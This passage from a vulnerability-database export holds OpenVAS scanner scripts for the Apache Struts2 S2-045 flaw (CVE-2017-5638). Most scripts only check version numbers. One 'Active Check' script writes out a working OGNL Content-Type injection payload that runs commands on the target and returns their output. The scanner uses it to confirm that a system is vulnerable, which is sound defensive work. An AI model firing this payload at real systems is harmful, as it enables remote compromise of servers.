12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, 
or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 
+0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n 
script_tag(name:\"affected\", value:\"Atlassian Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software 
Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n 
script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new 
java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can 
redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n 
script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free 
Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 
2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the 
Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. 
Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! 
vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:43:22", "description": "Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108771", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108771", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108771\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 Remote Code Execution Vulnerability in Huawei Products (huawei-sa-20170316-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website.\");\n\n script_tag(name:\"insight\", value:\"Apache Struts2 released a remote code execution vulnerability in S2-045 on the official website. An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value. (Vulnerability ID: HWPSIRT-2017-03094)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2017-5638.Huawei has released software updates to fix this vulnerability. 
This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"An attacker is possible to perform a RCE (Remote Code Execution) attack with a malicious Content-Type value.\");\n\n script_tag(name:\"affected\", value:\"AAA versions V300R003C30 V500R005C00 V500R005C10 V500R005C11 V500R005C12\n\nAnyOffice versions 2.5.0302.0201T 2.5.0501.0290\n\niManager NetEco 6000 versions V600R007C91\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170316-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "description": "Atlassian Crowd is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Crowd Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106653", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_crowd_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Crowd Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public 
License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:crowd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106653\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 